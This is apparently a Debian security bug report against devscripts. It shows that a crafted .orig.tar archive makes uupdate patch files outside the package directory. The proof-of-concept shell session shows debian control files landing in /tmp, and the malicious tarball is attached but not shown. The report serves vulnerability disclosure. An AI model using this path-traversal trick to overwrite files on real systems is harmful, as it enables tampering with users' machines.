Package: devscripts Version: 2.14.1 Tags: securityA malicious .orig.tar file can trick uupdate into patching files outside the source package directory. Proof of concept:
$ apt-get source -qq chewmail gpgv: Signature made Tue Aug 15 08:10:17 2006 CEST using DSA key ID 16D970C6 gpgv: Can't check signature: public key not found dpkg-source: warning: failed to verify signature on ./chewmail_1.2-1.dsc dpkg-source: info: extracting chewmail in chewmail-1.2 dpkg-source: info: unpacking chewmail_1.2.orig.tar.gz dpkg-source: info: applying chewmail_1.2-1.diff.gz $ cd chewmail-1.2/ $ ls /tmp/* ls: cannot access /tmp/*: No such file or directory $ uupdate -v2 /path/to/chewmail-2.tar.gz New Release will be 2-1. Symlinking to pristine source from chewmail_2.orig.tar.gz... -- Untarring the new sourcecode archive /path/to/chewmail-2.tar.gz Success! The diffs from version 1.2-1 worked fine. Remember: Your current directory is the OLD sourcearchive! Do a "cd ../chewmail-2" to see the new package $ ls /tmp/* /tmp/changelog /tmp/compat /tmp/control /tmp/copyright /tmp/rules -- Jakub Wilk
chewmail-2.tar.gz
Description: Binary data
